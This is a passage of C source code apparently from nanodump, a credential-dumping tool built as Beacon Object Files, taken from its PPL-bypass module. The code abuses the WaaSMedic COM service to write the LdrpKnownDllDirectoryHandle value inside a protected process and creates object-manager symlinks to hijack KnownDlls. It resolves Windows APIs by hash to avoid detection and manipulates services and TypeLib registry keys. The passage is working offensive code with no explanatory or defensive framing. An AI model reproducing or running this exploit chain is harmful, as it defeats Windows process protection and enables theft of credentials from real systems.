
    if (pCandidateAddressForward != pCandidateAddressBackward)
        goto cleanup;

    *Address = pCandidateAddressForward;
    ret_val = TRUE;

cleanup:
    if (ret_val)
    {
        DPRINT("DLL search path flag address: 0x%p", (PVOID)*Address);
    }

    return ret_val;
}

DWORD WINAPI write_remote_known_dll_handle_thread(LPVOID Parameter)
{
    PWRITE_REMOTE_KNOWN_DLL_HANDLE_PARAM WriteParams = (PWRITE_REMOTE_KNOWN_DLL_HANDLE_PARAM)Parameter;
    HRESULT                              hr          = 0;

    hr = invoke_launch_detection_only(
        WriteParams->WaaSRemediationEx,
        WriteParams->DispIdLaunchDetectionOnly,
        WriteParams->CallerApplicationName,
        WriteParams->WriteAtLaunchDetectionOnly);

    if (FAILED(hr))
    {
        DPRINT("LaunchDetectionOnly(0x%p): 0x%08lx", (PVOID)WriteParams->WriteAtLaunchDetectionOnly, hr);
        return (DWORD)hr;
    }

    hr = invoke_launch_remediation_only(
        WriteParams->WaaSRemediationEx,
        WriteParams->DispIdLaunchRemediationOnly,
        WriteParams->Plugins,
        WriteParams->CallerApplicationName,
        WriteParams->WriteAtLaunchRemediationOnly);

    if (FAILED(hr))
    {
        DPRINT("LaunchRemediationOnly(0x%p): 0x%08lx", (PVOID)WriteParams->WriteAtLaunchRemediationOnly, hr);
        return (DWORD)hr;
    }

    if (WriteParams->Strategy == EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_0)
    {
        hr = invoke_launch_remediation_only(
            WriteParams->WaaSRemediationEx,
            WriteParams->DispIdLaunchRemediationOnly,
            WriteParams->Plugins,
            WriteParams->CallerApplicationName,
            WriteParams->WriteAtLaunchRemediationOnly + 1);

        if (FAILED(hr))
        {
            DPRINT("LaunchRemediationOnly(0x%p): 0x%08lx", (PVOID)WriteParams->WriteAtLaunchRemediationOnly, hr);
            return (DWORD)hr;
        }
    }

    return ERROR_SUCCESS;
}

BOOL write_remote_known_dll_handle(
    IN PIWaaSRemediationEx IWaaSRemediationEx,
    IN LONG TargetValue,
    IN DISPID DispIdLaunchDetectionOnly,
    IN DISPID DispIdLaunchRemediationOnly,
    IN DWORD64 WriteAtLaunchDetectionOnly,
    IN DWORD64 WriteAtLaunchRemediationOnly)
{
    BOOL                                ret_val          = FALSE;
    BOOL                                success          = FALSE;
    WRITE_REMOTE_KNOWN_DLL_HANDLE_PARAM WriteParams      = { 0 };
    DWORD                               dwThreadId       = 0;
    DWORD                               dwThreadExitCode = ERROR_SUCCESS;
    HANDLE                              hThread          = NULL;

    CoCancelCall_t        CoCancelCall        = NULL;
    SysAllocString_t      SysAllocString      = NULL;
    CreateThread_t        CreateThread        = NULL;
    GetExitCodeThread_t   GetExitCodeThread   = NULL;
    WaitForSingleObject_t WaitForSingleObject = NULL;

    SysAllocString = (SysAllocString_t)(ULONG_PTR)get_function_address(
        get_library_address(OLEAUT32_DLL, TRUE),
        SysAllocString_SW2_HASH,
        0);
    if (!SysAllocString)
    {
        api_not_found("SysAllocString");
        goto cleanup;
    }

    CoCancelCall = (CoCancelCall_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoCancelCall_SW2_HASH,
        0);
    if (!CoCancelCall)
    {
        api_not_found("CoCancelCall");
        goto cleanup;
    }

    CreateThread = (CreateThread_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateThread_SW2_HASH,
        0);
    if (!CreateThread)
    {
        api_not_found("CreateThread");
        goto cleanup;
    }

    GetExitCodeThread = (GetExitCodeThread_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetExitCodeThread_SW2_HASH,
        0);
    if (!GetExitCodeThread)
    {
        api_not_found("GetExitCodeThread");
        goto cleanup;
    }

    WaitForSingleObject = (WaitForSingleObject_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        WaitForSingleObject_SW2_HASH,
        0);
    if (!WaitForSingleObject)
    {
        api_not_found("WaitForSingleObject");
        goto cleanup;
    }

    memset(&WriteParams, 0, sizeof(WriteParams));
    WriteParams.CallerApplicationName        = SysAllocString(L"");
    WriteParams.Plugins                      = SysAllocString(L"");
    WriteParams.DispIdLaunchDetectionOnly    = DispIdLaunchDetectionOnly;
    WriteParams.DispIdLaunchRemediationOnly  = DispIdLaunchRemediationOnly;
    WriteParams.Strategy                     = get_strategy(TargetValue);
    WriteParams.WaaSRemediationEx            = IWaaSRemediationEx;
    WriteParams.WriteAtLaunchDetectionOnly   = WriteAtLaunchDetectionOnly;
    WriteParams.WriteAtLaunchRemediationOnly = WriteAtLaunchRemediationOnly;

    hThread = CreateThread(NULL, 0, write_remote_known_dll_handle_thread, &WriteParams, 0, &dwThreadId);
    if (!hThread)
    {
        function_failed("CreateThread");
        goto cleanup;
    }

    if (WaitForSingleObject(hThread, TIMEOUT) != WAIT_OBJECT_0)
    {
        DPRINT("Thread with ID %ld is taking too long, cancelling...", dwThreadId);
        CoCancelCall(dwThreadId, TIMEOUT);
        goto cleanup;
    }

    success = GetExitCodeThread(hThread, &dwThreadExitCode);
    if (!success)
        goto cleanup;

    if (dwThreadExitCode != ERROR_SUCCESS)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    safe_close_handle(&hThread);

    if (!ret_val)
    {
        PRINT_ERR("Failed to write LdrpKnownDllDirectoryHandle value (thread exit code: 0x%08lx).", dwThreadExitCode);
    }

    return ret_val;

}

DWORD WINAPI create_task_handler_instance_thread(LPVOID Parameter)
{
    PITaskHandler pTaskHandler          = NULL;
    HRESULT       hr                    = E_FAIL;
    CLSID         CLSID_WaaSRemediation = CLSID_WAASREMEDIATION;
    IID           IID_TaskHandler       = IID_TASKHANDLER;

    CoCreateInstance_t CoCreateInstance = NULL;

    CoCreateInstance = (CoCreateInstance_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoCreateInstance_SW2_HASH,
        0);
    if (!CoCreateInstance)
    {
        api_not_found("CoCreateInstance");
        goto cleanup;
    }

    hr = CoCreateInstance(
        &CLSID_WaaSRemediation,
        NULL,
        CLSCTX_LOCAL_SERVER,
        &IID_TaskHandler,
        (LPVOID *)&pTaskHandler);
    if (SUCCEEDED(hr))
    {
        ITaskHandler_Release(pTaskHandler);
    }

cleanup:
    return (DWORD)hr;
}

BOOL create_task_handler_instance()
{
    BOOL    ret_val    = FALSE;
    HANDLE  hThread    = NULL;
    DWORD   dwThreadId = 0;

    CoCancelCall_t        CoCancelCall         = NULL;
    CreateThread_t        CreateThread         = NULL;
    WaitForSingleObject_t WaitForSingleObject  = NULL;

    CoCancelCall = (CoCancelCall_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoCancelCall_SW2_HASH,
        0);
    if (!CoCancelCall)
    {
        api_not_found("CoCancelCall");
        goto cleanup;
    }

    CreateThread = (CreateThread_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateThread_SW2_HASH,
        0);
    if (!CreateThread)
    {
        api_not_found("CreateThread");
        goto cleanup;
    }

    WaitForSingleObject = (WaitForSingleObject_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        WaitForSingleObject_SW2_HASH,
        0);
    if (!WaitForSingleObject)
    {
        api_not_found("WaitForSingleObject");
        goto cleanup;
    }

    hThread = CreateThread(NULL, 0, create_task_handler_instance_thread, NULL, 0, &dwThreadId);
    if (!hThread)
        goto cleanup;

    if (WaitForSingleObject(hThread, TIMEOUT) != WAIT_OBJECT_0)
    {
        DPRINT("Thread with ID %ld is taking too long, cancelling...", dwThreadId);
        CoCancelCall(dwThreadId, TIMEOUT);
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    safe_close_handle(&hThread);

    if (!ret_val)
    {
        DPRINT_ERR("Unexpected error or timeout while trying to create a remote TaskHandler instance.");
    }

    return ret_val;
}

BOOL release_client(
    IN PIWaaSRemediationEx IWaaSRemediationEx)
{
    BOOL ret_val = FALSE;

    CoDisableCallCancellation_t CoDisableCallCancellation = NULL;
    CoUninitialize_t            CoUninitialize            = NULL;

    CoDisableCallCancellation = (CoDisableCallCancellation_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoDisableCallCancellation_SW2_HASH,
        0);
    if (!CoDisableCallCancellation)
    {
        api_not_found("CoDisableCallCancellation");
        goto cleanup;
    }

    CoUninitialize = (CoUninitialize_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoUninitialize_SW2_HASH,
        0);
    if (!CoUninitialize)
    {
        api_not_found("CoUninitialize");
        goto cleanup;
    }

    IWaaSRemediationEx_Release(IWaaSRemediationEx);
    CoDisableCallCancellation(NULL);
    CoUninitialize();

    ret_val = TRUE;

cleanup:
    return ret_val;
}


================================================
FILE: Creds-BOF/nanodump/source/ppl/ppl_medic_dll.c
================================================
#include "ppl/ppl_medic_dll.h"

BOOL signal_dll_load_event(
    IN LPWSTR event_name)
{
    BOOL   ret_val       = FALSE;
    BOOL   success       = FALSE;
    HANDLE hEvent        = NULL;
    LPWSTR pwszEventName = NULL;

    OpenEventW_t OpenEventW = NULL;
    SetEvent_t   SetEvent   = NULL;

    OpenEventW = (OpenEventW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        OpenEventW_SW2_HASH,
        0);
    if (!OpenEventW)
    {
        api_not_found("OpenEventW");
        goto cleanup;
    }

    SetEvent = (SetEvent_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        SetEvent_SW2_HASH,
        0);
    if (!SetEvent)
    {
        api_not_found("SetEvent");
        goto cleanup;
    }

    pwszEventName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszEventName)
    {
        malloc_failed();
        goto cleanup;
    }

    swprintf_s(pwszEventName, MAX_PATH, L"Global\\%ws", event_name);

    hEvent = OpenEventW(EVENT_MODIFY_STATE, FALSE, pwszEventName);
    if (!hEvent)
    {
        function_failed("OpenEventW");
        goto cleanup;
    }

    success = SetEvent(hEvent);
    if (!success)
    {
        function_failed("SetEvent");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (hEvent)
        NtClose(hEvent);
    if (pwszEventName)
        intFree(pwszEventName);

    return ret_val;
}


================================================
FILE: Creds-BOF/nanodump/source/ppl/ppl_utils.c
================================================
#include "ppl/ppl_utils.h"

BOOL is_win_6_point_3_or_grater(VOID)
{
    PVOID pPeb;
    ULONG32 OSMajorVersion;
    ULONG32 OSMinorVersion;

    pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    OSMajorVersion = *RVA(PULONG32, pPeb, OSMAJORVERSION_OFFSET);
    OSMinorVersion = *RVA(PULONG32, pPeb, OSMINORVERSION_OFFSET);

    if (OSMajorVersion > 6)
        return TRUE;

    if (OSMajorVersion < 6)
        return FALSE;

    if (OSMinorVersion >= 3)
        return TRUE;

    return FALSE;
}

BOOL is_win_10_or_grater(VOID)
{
    PVOID pPeb;
    ULONG32 OSMajorVersion;

    pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    OSMajorVersion = *RVA(PULONG32, pPeb, OSMAJORVERSION_OFFSET);

    if (OSMajorVersion >= 10)
        return TRUE;

    return FALSE;
}

BOOL object_manager_create_directory(
    IN LPWSTR dirname,
    OUT PHANDLE phDirectory)
{
    OBJECT_ATTRIBUTES oa = { 0 };
    UNICODE_STRING name = { 0 };
    NTSTATUS status = 0;

    *phDirectory = NULL;

    name.Buffer  = dirname;
    name.Length  = (USHORT)wcsnlen(name.Buffer, MAX_PATH);;
    name.Length *= 2;
    name.MaximumLength = name.Length + 2;
    InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtCreateDirectoryObjectEx(
        phDirectory,
        DIRECTORY_ALL_ACCESS,
        &oa,
        NULL,
        FALSE);
    // if we get STATUS_OBJECT_NAME_COLLISION, assume is already created
    if (status != STATUS_OBJECT_NAME_COLLISION && !NT_SUCCESS(status))
    {
        syscall_failed("NtCreateDirectoryObjectEx", status);
        return FALSE;
    }

    return TRUE;
}

BOOL object_manager_create_symlik(
    IN LPWSTR linkname,
    IN LPWSTR targetname,
    OUT PHANDLE phLink)
{
    OBJECT_ATTRIBUTES oa = { 0 };
    UNICODE_STRING name = { 0 };
    UNICODE_STRING target = { 0 };
    NTSTATUS status;

    *phLink = NULL;

    name.Buffer  = linkname;
    name.Length  = (USHORT)wcsnlen(name.Buffer, MAX_PATH);;
    name.Length *= 2;
    name.MaximumLength = name.Length + 2;

    target.Buffer  = targetname;
    target.Length  = (USHORT)wcsnlen(target.Buffer, MAX_PATH);;
    target.Length *= 2;
    target.MaximumLength = target.Length + 2;

    InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtCreateSymbolicLinkObject(
        phLink,
        SYMBOLIC_LINK_ALL_ACCESS,
        &oa,
        &target);
    // if we get STATUS_OBJECT_NAME_COLLISION, assume is already created
    if (status != STATUS_OBJECT_NAME_COLLISION && !NT_SUCCESS(status))
    {
        syscall_failed("NtCreateSymbolicLinkObject", status);
        return FALSE;
    }

    return TRUE;
}

BOOL check_known_dll_symbolic_link(
    IN LPCWSTR pwszDllName,
    IN LPWSTR pwszTarget)
{
    BOOL bReturnValue = FALSE;
    NTSTATUS status = 0;
    LPWSTR pwszLinkName = NULL;
    OBJECT_ATTRIBUTES oa = { 0 };
    UNICODE_STRING name = { 0 };
    UNICODE_STRING target = { 0 };
    LPWSTR pwszTargetLocal = NULL;
    HANDLE hLink = NULL;
    ULONG length = 0;

    pwszLinkName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszLinkName)
    {
        malloc_failed();
        goto end;
    }

    pwszTargetLocal = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszTargetLocal)
    {
        malloc_failed();
        goto end;
    }

    wcsncpy(pwszLinkName, L"\\KnownDlls\\", MAX_PATH);
    wcsncat(pwszLinkName, pwszDllName, MAX_PATH);

    name.Buffer  = pwszLinkName;
    name.Length  = (USHORT)wcsnlen(name.Buffer, MAX_PATH);;
    name.Length *= 2;
    name.MaximumLength = name.Length + 2;
    InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtOpenSymbolicLinkObject(
        &hLink,
        SYMBOLIC_LINK_QUERY,
        &oa);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenSymbolicLinkObject", status);
        goto end;
    }

    target.Buffer = pwszTargetLocal;
    target.Length = 0;
    target.MaximumLength = (MAX_PATH + 1) * sizeof(WCHAR);

    status = NtQuerySymbolicLinkObject(
        hLink,
        &target,
        &length);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQuerySymbolicLinkObject", status);
        goto end;
    }

    bReturnValue = _wcsicmp(target.Buffer, pwszTarget) == 0;

end:
    if (pwszLinkName)
    {
        DATA_FREE(pwszLinkName, wcslen(pwszLinkName) * sizeof(WCHAR));
    }
    if (pwszTargetLocal)
    {
        DATA_FREE(pwszTargetLocal, wcslen(pwszTargetLocal) * sizeof(WCHAR));
    }
    if (hLink)
        NtClose(hLink);

    return bReturnValue;
}

BOOL get_file_size(
    IN HANDLE hFile,
    OUT PDWORD file_size)
{
    NTSTATUS status;
    IO_STATUS_BLOCK IoStatusBlock;
    FILE_STANDARD_INFORMATION fsi = { 0 };

    if (!hFile)
        return FALSE;

    status = NtQueryInformationFile(
        hFile,
        &IoStatusBlock,
        &fsi,
        sizeof(FILE_STANDARD_INFORMATION),
        FileStandardInformation);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationFile", status);
        return FALSE;
    }

    // TODO: get the full QuadPart?
    *file_size = fsi.AllocationSize.LowPart;

    return TRUE;
}

BOOL query_service_status_process_by_handle(
    IN SC_HANDLE ServiceHandle,
    IN OUT LPSERVICE_STATUS_PROCESS ServiceStatus)
{
    BOOL  ret_val       = FALSE;
    BOOL  success       = FALSE;
    DWORD dwBytesNeeded = 0;

    QueryServiceStatusEx_t QueryServiceStatusEx = NULL;

    QueryServiceStatusEx = (QueryServiceStatusEx_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        QueryServiceStatusEx_SW2_HASH,
        0);
    if (!QueryServiceStatusEx)
    {
        api_not_found("QueryServiceStatusEx");
        goto cleanup;
    }

    memset(ServiceStatus, 0, sizeof(*ServiceStatus));

    success = QueryServiceStatusEx(
        ServiceHandle,
        SC_STATUS_PROCESS_INFO,
        (LPBYTE)ServiceStatus,
        sizeof(*ServiceStatus),
        &dwBytesNeeded);
    if (!success)
    {
        function_failed("QueryServiceStatusEx");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL get_service_handle(
    IN LPCWSTR ServiceName,
    IN DWORD DesiredAccess,
    OUT LPSC_HANDLE ServiceHandle)
{
    BOOL                 ret_val            = FALSE;
    SC_HANDLE            hSCM               = NULL;
    OpenSCManagerW_t     OpenSCManagerW     = NULL;
    OpenServiceW_t       OpenServiceW       = NULL;
    CloseServiceHandle_t CloseServiceHandle = NULL;

    OpenSCManagerW = (OpenSCManagerW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        OpenSCManagerW_SW2_HASH,
        0);
    if (!OpenSCManagerW)
    {
        api_not_found("OpenSCManagerW");
        goto cleanup;
    }

    OpenServiceW = (OpenServiceW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        OpenServiceW_SW2_HASH,
        0);
    if (!OpenServiceW)
    {
        api_not_found("OpenServiceW");
        goto cleanup;
    }

    CloseServiceHandle = (CloseServiceHandle_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CloseServiceHandle_SW2_HASH,
        0);
    if (!CloseServiceHandle)
    {
        api_not_found("CloseServiceHandle");
        goto cleanup;
    }

    *ServiceHandle = NULL;

    hSCM = OpenSCManagerW(NULL, SERVICES_ACTIVE_DATABASEW, SC_MANAGER_CONNECT);
    if (!hSCM)
    {
        function_failed("OpenSCManagerW");
        goto cleanup;
    }

    *ServiceHandle = OpenServiceW(hSCM, ServiceName, DesiredAccess);
    if (!*ServiceHandle)
    {
        function_failed("OpenSCManagerW");
        goto cleanup;
    }
    
    ret_val = TRUE;

cleanup:
    if (hSCM)
        CloseServiceHandle(hSCM);

    return ret_val;
}

BOOL query_service_status_process_by_name(
    IN LPCWSTR ServiceName,
    IN OUT LPSERVICE_STATUS_PROCESS ServiceStatus)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    SC_HANDLE hService = NULL;

    CloseServiceHandle_t CloseServiceHandle = NULL;

    CloseServiceHandle = (CloseServiceHandle_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CloseServiceHandle_SW2_HASH,
        0);
    if (!CloseServiceHandle)
    {
        api_not_found("CloseServiceHandle");
        goto cleanup;
    }

    success = get_service_handle(ServiceName, SERVICE_QUERY_STATUS, &hService);
    if (!success)
        goto cleanup;

    success = query_service_status_process_by_handle(hService, ServiceStatus);
    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (hService) CloseServiceHandle(hService);

    return ret_val;
}

BOOL get_service_status_by_name(
    IN LPCWSTR ServiceName,
    OUT LPDWORD Status)
{
    BOOL ret_val = FALSE;
    SERVICE_STATUS_PROCESS ssp;

    *Status = 0;

    ret_val = query_service_status_process_by_name(ServiceName, &ssp);
    *Status = ssp.dwCurrentState;

    if (ret_val)
    {
        DPRINT("State of service with name '%ls': %ld", ServiceName, *Status);
    }

    return ret_val;
}

// https://docs.microsoft.com/en-us/windows/win32/services/stopping-a-service
BOOL stop_service_by_name(
    IN LPCWSTR ServiceName,
    IN BOOL Wait)
{
    BOOL                   ret_val        = FALSE;
    BOOL                   success        = FALSE;
    SC_HANDLE              hService       = NULL;
    SERVICE_STATUS_PROCESS ssp            = { 0 };
    DWORD64                dwStartTime    = 0;
    DWORD                  dwWaitTime     = 0;

    GetTickCount64_t     GetTickCount64     = NULL;
    ControlService_t     ControlService     = NULL;
    Sleep_t              Sleep              = NULL;
    CloseServiceHandle_t CloseServiceHandle = NULL;

    GetTickCount64 = (GetTickCount64_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetTickCount64_SW2_HASH,
        0);
    if (!GetTickCount64)
    {
        api_not_found("GetTickCount64");
        goto cleanup;
    }

    ControlService = (ControlService_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        ControlService_SW2_HASH,
        0);
    if (!ControlService)
    {
        api_not_found("ControlService");
        goto cleanup;
    }

    Sleep = (Sleep_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        Sleep_SW2_HASH,
        0);
    if (!Sleep)
    {
        api_not_found("Sleep");
        goto cleanup;
    }

    CloseServiceHandle = (CloseServiceHandle_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CloseServiceHandle_SW2_HASH,
        0);
    if (!CloseServiceHandle)
    {
        api_not_found("CloseServiceHandle");
        goto cleanup;
    }

    dwStartTime = GetTickCount64();

    success = get_service_handle(ServiceName, SERVICE_QUERY_STATUS | SERVICE_STOP, &hService);
    if (!success)
        goto cleanup;

    success = ControlService(hService, SERVICE_CONTROL_STOP, (LPSERVICE_STATUS)&ssp);
    if (!success)
        goto cleanup;

    success = query_service_status_process_by_handle(hService, &ssp);
    if (!success)
        goto cleanup;

    if (Wait)
    {
        DPRINT("Stopping service %ls...", ServiceName);

        while (ssp.dwCurrentState != SERVICE_STOPPED)
        {
            dwWaitTime = ssp.dwWaitHint / 10;

            if (dwWaitTime < 1000)
                dwWaitTime = 1000;
            else if (dwWaitTime > 10000)
                dwWaitTime = 10000;

            Sleep(dwWaitTime);

            if (!query_service_status_process_by_handle(hService, &ssp))
                break;

            if (GetTickCount64() - dwStartTime > TIMEOUT)
            {
                break;
            }
        }

        ret_val = ssp.dwCurrentState == SERVICE_STOPPED;
    }
    else
    {
        ret_val = TRUE;
    }

cleanup:
    if (hService) CloseServiceHandle(hService);

    if (!ret_val)
        DPRINT_ERR("Failed to stop service %ls.", ServiceName);

    return ret_val;
}

// https://docs.microsoft.com/en-us/windows/win32/services/starting-a-service
BOOL start_service_by_name(
    IN LPCWSTR ServiceName,
    IN BOOL Wait)
{
    BOOL                   ret_val        = FALSE;
    BOOL                   success        = FALSE;
    SC_HANDLE              hService       = NULL;
    SERVICE_STATUS_PROCESS ssp            = { 0 };
    DWORD64                dwStartTime    = 0;
    DWORD                  dwWaitTime     = 0;

    GetTickCount64_t     GetTickCount64     = NULL;
    StartServiceW_t      StartServiceW      = NULL;
    Sleep_t              Sleep              = NULL;
    CloseServiceHandle_t CloseServiceHandle = NULL;

    GetTickCount64 = (GetTickCount64_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetTickCount64_SW2_HASH,
        0);
    if (!GetTickCount64)
    {
        api_not_found("GetTickCount64");
        goto cleanup;
    }

    StartServiceW = (StartServiceW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        StartServiceW_SW2_HASH,
        0);
    if (!StartServiceW)
    {
        api_not_found("StartServiceW");
        goto cleanup;
    }

    Sleep = (Sleep_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        Sleep_SW2_HASH,
        0);
    if (!Sleep)
    {
        api_not_found("Sleep");
        goto cleanup;
    }

    CloseServiceHandle = (CloseServiceHandle_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CloseServiceHandle_SW2_HASH,
        0);
    if (!CloseServiceHandle)
    {
        api_not_found("CloseServiceHandle");
        goto cleanup;
    }

    dwStartTime = GetTickCount64();

    success = get_service_handle(ServiceName, SERVICE_QUERY_STATUS | SERVICE_START, &hService);
    if (!success)
        goto cleanup;

    success = StartServiceW(hService, 0, NULL);
    if (!success)
        goto cleanup;

    success = query_service_status_process_by_handle(hService, &ssp);
    if (!success)
        goto cleanup;

    if (Wait)
    {
        while (ssp.dwCurrentState != SERVICE_RUNNING)
        {
            dwWaitTime = ssp.dwWaitHint / 10;

            if (dwWaitTime < 1000)
                dwWaitTime = 1000;
            else if (dwWaitTime > 10000)
                dwWaitTime = 10000;

            Sleep(dwWaitTime);

            if (!query_service_status_process_by_handle(hService, &ssp))
                break;

            if (GetTickCount64() - dwStartTime > TIMEOUT)
            {
                break;
            }
        }

        ret_val = ssp.dwCurrentState == SERVICE_RUNNING;
    }
    else
    {
        ret_val = TRUE;
    }

cleanup:
    if (hService) CloseServiceHandle(hService);

    return ret_val;
}

BOOL get_service_process_id(
    IN LPCWSTR ServiceName,
    OUT LPDWORD ProcessId)
{
    BOOL                   ret_val = FALSE;
    SERVICE_STATUS_PROCESS ssp     = { 0 };

    *ProcessId = 0;

    ret_val = query_service_status_process_by_name(ServiceName, &ssp);
    *ProcessId = ssp.dwProcessId;

    if (ret_val)
    {
        DPRINT("PID of service with name '%ls': %ld", ServiceName, *ProcessId);
    }

    return ret_val;
}

VOID safe_free(
    IN PVOID* Memory)
{
    if (Memory && *Memory)
    {
        intFree(*Memory);
        *Memory = NULL;
    }
}

VOID safe_release(
    IN IUnknown** Interface)
{
    if (Interface && *Interface)
    {
        (*Interface)->lpVtbl->Release((*Interface));
        *Interface = NULL;
    }
}

BOOL get_type_lib_reg_value_path(
    OUT LPWSTR* TypeLibRegValuePath)
{
    BOOL       ret_val          = FALSE;
    BOOL       success          = FALSE;
    LPWSTR     pwszRegPath      = NULL;
    LPWSTR     pwszTypeLibGuid  = NULL;
    RPC_WSTR   InterfaceGuidStr = NULL;
    UUID       InterfaceGuid    = IID_WAASREMEDIATIONEX;
    RPC_STATUS rpc_status       = RPC_S_OK;

    UuidToStringW_t  UuidToStringW  = NULL;
    RpcStringFreeW_t RpcStringFreeW = NULL;

    UuidToStringW = (UuidToStringW_t)(ULONG_PTR)get_function_address(
        get_library_address(RPCRT4_DLL, TRUE),
        UuidToStringW_SW2_HASH,
        0);
    if (!UuidToStringW)
    {
        api_not_found("UuidToStringW");
        goto cleanup;
    }

    RpcStringFreeW = (RpcStringFreeW_t)(ULONG_PTR)get_function_address(
        get_library_address(RPCRT4_DLL, TRUE),
        RpcStringFreeW_SW2_HASH,
        0);
    if (!RpcStringFreeW)
    {
        api_not_found("RpcStringFreeW");
        goto cleanup;
    }

    //
    // HKLM\SOFTWARE\Classes\Interface\{B4C1D279-966E-44E9-A9C5-CCAF4A77023D}\TypeLib
    //      (Default) -> {3ff1aab8-f3d8-11d4-825d-00104b3646c0}
    // HKLM\SOFTWARE\Classes\TypeLib\{3ff1aab8-f3d8-11d4-825d-00104b3646c0}\1.0\0\Win64
    //      (Default) -> %SystemRoot%\system32\WaaSMedicPS.dll
    //

    pwszRegPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszRegPath)
    {
        malloc_failed();
        goto cleanup;
    }

    rpc_status = UuidToStringW(&InterfaceGuid, &InterfaceGuidStr);
    if (rpc_status != RPC_S_OK)
    {
        function_failed("UuidToStringW");
        goto cleanup;
    }

    swprintf_s(pwszRegPath, MAX_PATH, L"SOFTWARE\\Classes\\Interface\\{%ws}\\TypeLib", (LPWSTR)InterfaceGuidStr);

    success = get_registry_string_value(HKEY_LOCAL_MACHINE, pwszRegPath, NULL, &pwszTypeLibGuid);
    if (!success)
        goto cleanup;

    *TypeLibRegValuePath = intAlloc(MAX_PATH + 2);
    if (!*TypeLibRegValuePath)
    {
        malloc_failed();
        goto cleanup;
    }

    swprintf_s(*TypeLibRegValuePath, MAX_PATH, L"SOFTWARE\\Classes\\TypeLib\\%ws\\1.0\\0\\Win64", pwszTypeLibGuid);

    ret_val = TRUE;

cleanup:
    if (InterfaceGuidStr) RpcStringFreeW(&InterfaceGuidStr);
    safe_free((PVOID*)&pwszTypeLibGuid);
    safe_free((PVOID*)&pwszRegPath);

    if (!ret_val && *TypeLibRegValuePath)
    {
        intFree(*TypeLibRegValuePath);
        *TypeLibRegValuePath = NULL;
    }

    if (ret_val)
    {
        DPRINT("Path: %ls", *TypeLibRegValuePath);
    }

    return ret_val;
}

BOOL set_registry_string_value(
    IN HKEY Key,
    IN LPCWSTR SubKey,
    IN LPCWSTR ValueName,
    IN LPCWSTR ValueData)
{
    BOOL    ret_val    = FALSE;
    LSTATUS status     = ERROR_SUCCESS;
    HKEY    hKey       = NULL;
    DWORD   dwDataSize = 0;

    RegSetValueExW_t RegSetValueExW = NULL;
    RegOpenKeyExW_t  RegOpenKeyExW  = NULL;
    RegCloseKey_t    RegCloseKey    = NULL;

    RegSetValueExW = get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RegSetValueExW_SW2_HASH,
        0);
    if (!RegSetValueExW)
    {
        api_not_found("RegSetValueExW");
        goto cleanup;
    }

    RegOpenKeyExW = get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RegOpenKeyExW_SW2_HASH,
        0);
    if (!RegOpenKeyExW)
    {
        api_not_found("RegOpenKeyExW");
        goto cleanup;
    }

    RegCloseKey = get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RegCloseKey_SW2_HASH,
        0);
    if (!RegCloseKey)
    {
        api_not_found("RegCloseKey");
        goto cleanup;
    }

    dwDataSize = ((DWORD)wcslen(ValueData) + 1) * sizeof(WCHAR);

